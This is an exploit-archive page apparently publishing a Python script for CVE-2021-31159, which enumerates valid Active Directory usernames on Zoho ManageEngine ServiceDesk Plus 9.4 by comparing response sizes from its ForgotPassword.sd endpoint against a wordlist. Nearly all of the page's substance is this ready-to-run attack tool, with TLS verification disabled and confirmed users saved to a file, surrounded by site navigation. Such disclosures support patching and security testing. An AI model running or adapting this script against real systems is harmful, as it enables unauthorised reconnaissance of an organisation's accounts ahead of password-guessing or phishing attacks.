Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration: Posted Jun 17, 2021; Authored by Ricardo Jose Ruiz Fernandez; Zoho ManageEngine ServiceDesk Plus version 9.4 suffers from a user enumeration vulnerability.; tags | exploit; advisories | CVE-2021-31159; SHA-256 | 870a1afb9f1433380867e92d6f4b12a310e6ee87a00b11040bf6cfbd0e03d858; Download | Favorite | View

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP - Active Directory User Enumeration (CVE-2021-31159)
# Date: 17/06/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159)
# Vendor Homepage: https://www.manageengine.com
# Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519
# Version: Previous to build 10519
# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
# Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159

import argparse
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def get_args():
  parser = argparse.ArgumentParser()
  parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
  parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack')
  parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file')  
  parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file')
  my_args = parser.parse_args()
  return my_args


def main():
  args = get_args()
  url = args.target
  domain = args.domain
  usersfile = args.usersfile
  outputfile = args.outputfile

  s = requests.session()
  s.get(url)
  resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False)
  incorrect_size = len(resp_incorrect.content)
  print("Incorrect size: %s"%(incorrect_size))

  correct_users = []
  users = open(usersfile).read().splitlines()
  for u in users:
      resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False) 
      valid = (len(resp.content) != incorrect_size)
      if valid:
        correct_users.append(u)
      print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid)))

  print("\nCorrect users\n")
  with open(outputfile, 'w') as f:
    for user in correct_users:
      f.write("%s\n" % user)
      print("- %s"%(user))

  print("\nResults stored in %s\n"%(outputfile))


if __name__ == "__main__":
    main()

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 89 files
Gentoo 31 files
Debian 22 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,079)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,380)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,289)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,663)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

Share This

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems